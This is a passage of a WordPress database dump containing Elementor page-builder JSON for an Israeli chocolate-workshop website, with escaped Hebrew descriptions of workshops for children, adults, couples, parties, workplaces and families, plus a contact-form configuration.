\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2373,440,'_elementor_edit_mode','builder'),(2374,440,'_elementor_template_type','wp-page'),(2375,440,'_elementor_version','2.7.5'),(2376,440,'_elementor_pro_version','2.7.3'),(2377,440,'_wp_page_template','elementor_header_footer'),(2378,440,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2379,440,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\",\"header_size\":\"h1\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":59,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ebd837\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"31912ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dab0376\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/01\\/chocolate-1285928_640.jpg\",\"id\":307},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05dc\\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d4\\u05de\\u05e9\\u05e4\\u05d7\\u05d4. \\u05d0\\u05d9\\u05df \\u05db\\u05de\\u05d5 \\u05d6\\u05de\\u05df \\u05d0\\u05d9\\u05db\\u05d5\\u05ea \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d5\\u05de\\u05d2\\u05d1\\u05e9 \\u05e9\\u05d9\\u05d7\\u05de\\u05dd \\u05dc\\u05db\\u05dd \\u05d0\\u05ea \\u05d4\\u05dc\\u05d1.\\n\\u05d1\\u05d0\\u05de\\u05e6\\u05e2\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea 